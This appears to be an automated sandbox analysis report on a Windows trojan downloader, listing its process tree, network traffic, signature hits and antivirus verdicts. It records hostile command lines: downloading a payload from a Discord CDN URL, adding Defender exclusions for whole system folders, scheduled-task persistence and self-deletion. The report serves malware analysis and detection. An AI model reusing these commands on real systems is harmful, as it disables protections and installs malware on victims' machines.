Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Aug. 25, 2021, 9:11 a.m. | Aug. 25, 2021, 9:14 a.m. |
-
-
cmd.exe "C:\Windows\system32\cmd" /c "C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\7B16.bat C:\Users\test22\AppData\Local\Temp\1.exe"
1636-
extd.exe C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
1080 -
extd.exe C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
1376 -
extd.exe C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/878569652987502634/878573089506607124/mmserv32.exe" "mmserv32.exe" "" "" "" "" "" ""
1168 -
-
cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
2452-
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
2712 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
2440 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
1788 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
2928
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\7877\mmserv32.exe"
248-
svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\7877\mmserv32.exe"
1328-
cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"' & exit
240-
schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"'
888
-
-
-
cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
1956-
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
2512 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
2060
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\msorg32.exe"
2396-
svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\msorg32.exe"
1088-
cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"' & exit
1428-
schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"'
2500
-
-
-
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
2392-
choice.exe choice /C Y /N /D Y /T 3
2300
-
-
-
-
-
extd.exe C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
2404
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
ocsp.digicert.com |
CNAME
cs9.wac.phicdn.net
|
117.18.237.29 |
cdn.discordapp.com | 162.159.134.233 |
Suricata Alerts
No Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.102:49170 162.159.129.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 54:e1:a7:9d:cc:c8:60:86:f1:a5:da:74:0e:5a:ab:45:df:37:8a:78 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
section | .code |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://cdn.discordapp.com/attachments/878569652987502634/878573089506607124/mmserv32.exe |
request | GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D |
request | GET https://cdn.discordapp.com/attachments/878569652987502634/878573089506607124/mmserv32.exe |
file | C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\7B16.bat |
file | C:\Users\test22\AppData\Local\Temp\7877\mmserv32.exe |
file | C:\Users\test22\AppData\Local\Temp\svchost32.exe |
file | C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\extd.exe |
file | C:\Users\test22\AppData\Local\Temp\7877\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\7877\mmserv32.exe" |
cmdline | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp' |
cmdline | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22' |
cmdline | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming' |
cmdline | schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"' |
cmdline | cmd /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\7877\mmserv32.exe" |
cmdline | C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\msorg32.exe" |
cmdline | cmd /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe" |
cmdline | powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows' |
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"' & exit |
cmdline | cmd /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\msorg32.exe" |
cmdline | C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\7877\mmserv32.exe" |
cmdline | cmd /c schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"' & exit |
cmdline | "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit |
cmdline | "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\msorg32.exe" |
cmdline | "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe" |
section | {u'size_of_data': u'0x00052600', u'virtual_address': u'0x00022000', u'entropy': 7.9980470317374595, u'name': u'.rsrc', u'virtual_size': u'0x00052430'} | entropy | 7.99804703174 | description | A section with a high entropy has been found | |||||||||
entropy | 0.733853006682 | description | Overall entropy of this PE file is high |
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook |
cmdline | schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"' |
cmdline | cmd /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe" |
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"' & exit |
cmdline | cmd /c schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"' & exit |
cmdline | "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe" |
cmdline | "C:\Windows\system32\cmd" /c "C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\7B16.bat C:\Users\test22\AppData\Local\Temp\1.exe" |
file | C:\Users\test22\AppData\Local\Temp\goto:eof |
file | C:\Users\test22\AppData\Local\Temp\7877\goto:eof |
file | C:\Users\test22\AppData\Local\Temp\7877\call:extd |
file | C:\Users\test22\AppData\Local\Temp\call:extd |
cmdline | schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"' |
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"' & exit |
cmdline | cmd /c schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"' & exit |
file | C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\extd.exe |
file | C:\Users\test22\AppData\Local\Temp\7877\mmserv32.exe |
file | C:\Users\test22\AppData\Local\Temp\svchost32.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
Lionic | Trojan.Win32.Cryrar.tqFl |
Elastic | malicious (high confidence) |
Cynet | Malicious (score: 100) |
ALYac | Gen:Variant.Bulz.569703 |
Cylance | Unsafe |
Zillya | Trojan.Generic.Win32.922194 |
CrowdStrike | win/malicious_confidence_60% (W) |
Alibaba | TrojanDownloader:BAT/Generic.5e470fec |
K7GW | Trojan-Downloader ( 0058026e1 ) |
K7AntiVirus | Trojan-Downloader ( 0058026e1 ) |
Arcabit | Trojan.Bulz.D8B167 |
Symantec | Trojan.Gen.2 |
ESET-NOD32 | BAT/TrojanDownloader.Agent.OIU |
APEX | Malicious |
Paloalto | generic.ml |
Kaspersky | Trojan.Win32.Bingoml.ceyw |
BitDefender | Gen:Variant.Bulz.569703 |
MicroWorld-eScan | Gen:Variant.Bulz.569703 |
Avast | FileRepMalware |
Ad-Aware | Gen:Variant.Bulz.569703 |
Emsisoft | Gen:Variant.Bulz.569703 (B) |
McAfee-GW-Edition | BehavesLike.Win64.Skintrim.gc |
FireEye | Generic.mg.a1e0aa315c2caf13 |
Sophos | Generic ML PUA (PUA) |
Ikarus | Trojan-Downloader.BAT.Agent |
MaxSecure | Trojan.Malware.300983.susgen |
Avira | TR/Dldr.Agent.oqqxg |
Antiy-AVL | Trojan/Generic.ASMalwS.2BB2C00 |
Gridinsoft | Trojan.Win64.Downloader.sa |
Microsoft | Trojan:Win32/Sabsik.FL.B!ml |
ZoneAlarm | Trojan.Win32.Bingoml.ceyw |
GData | Gen:Variant.Bulz.569703 |
AhnLab-V3 | Trojan/Win.Generic.C4603938 |
McAfee | Artemis!A1E0AA315C2C |
MAX | malware (ai score=82) |
Malwarebytes | Trojan.Downloader |
TrendMicro-HouseCall | TROJ_GEN.R049H09HL21 |
Tencent | Bat.Trojan-downloader.Agent.Lndw |
SentinelOne | Static AI - Malicious PE |
Fortinet | BAT/Agent.OIU!tr.dldr |
AVG | FileRepMalware |
Panda | Trj/CI.A |